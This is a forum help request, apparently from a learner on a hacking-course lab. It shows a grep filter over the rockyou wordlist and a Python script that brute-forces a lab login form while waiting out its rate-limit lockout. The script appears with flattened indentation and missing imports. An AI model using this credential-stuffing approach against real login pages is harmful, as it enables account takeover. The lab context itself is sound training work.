Hi guys, I’m having extreme difficulty completing the skill assessment, I’ll mention what I’ve already done.
- Discover 10 users being support.XX and admin.XX
- I performed a filter with rockyou’s password policies with the following command:
grep '^[[:upper:]]' /usr/share/wordlists/rockyou.txt | grep '[[:lower:]]' | grep '[[:digit:]]$' | grep '[[:punct:]]' | grep -E '^.{20,}$'
I adapted rate_limit_check_py to see if I could get a valid password for a user, but so far nothing. I’ve already tried brute force via ffuf, wfuzz, hydra. I’ve been stuck on this for a long time, could anyone help me? I’ll leave the adapted script below:
# file that contain user:pass
userpass_file = "wordlistsecond.txt"
userlist_file = "userlist.txt"
# create url using user and password as airgument
url = "http://94.237.62.195:40807/login.php"
# rate limit blocks for 30 seconds
lock_time = 31
# message that alert us we hit rate limit
lock_message = "Too many failures"
# read user and password
while True:
with open(userpass_file,"r") as fp:
for plinha in fp:
if plinha.startswith("#"):
continue
with open(userlist_file,"r") as fu:
for ulinha in fu:
data = {
"userid": ulinha,
"passwd": plinha,
"submit": "submit",
"remember": "remember"
}
res = requests.post(url, data=data)
if "Invalid credentials" in res.text:
print("[-] Invalid credentials: userid:{} passwd:{}".format(ulinha,plinha))
elif "Messages" in res.text:
print("[++++++++++++++++++++] Valid credentials: userid:{} passwd:{}".format(ulinha,plinha))
elif lock_message in res.text:
print("[-] Hit rate limiti, sleeping 30s")
time.sleep(31)